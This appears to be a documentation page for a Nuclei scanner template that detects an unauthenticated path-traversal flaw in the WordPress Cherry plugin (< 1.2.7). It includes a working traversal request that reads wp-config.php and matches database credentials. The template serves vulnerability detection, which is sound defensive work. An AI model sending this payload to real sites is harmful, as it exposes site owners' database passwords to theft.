Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload
ID: cherry-file-download
Severity: high
Author: 0x_Akoko
Tags: wordpress,wp-plugin,lfi,wpscan
Description
Section titled “Description”WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
YAML Source
Section titled “YAML Source”id: cherry-file-download
info: name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload author: 0x_Akoko severity: high description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://github.com/CherryFramework/cherry-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 1 tags: wordpress,wp-plugin,lfi,wpscan
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition: and matchers: - type: word words: - "DB_NAME" - "DB_PASSWORD" part: body condition: and
- type: status status: - 200# digest: 4a0a0047304502206c2d3cd46a0ec6372d429996a99499ef00a36531aafb37ba7f379ddb007f13020221008e56fc08d006e245a70d8def07735bf44ee79f13966e721c4a46860597927d40:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/cherry-file-download.yaml"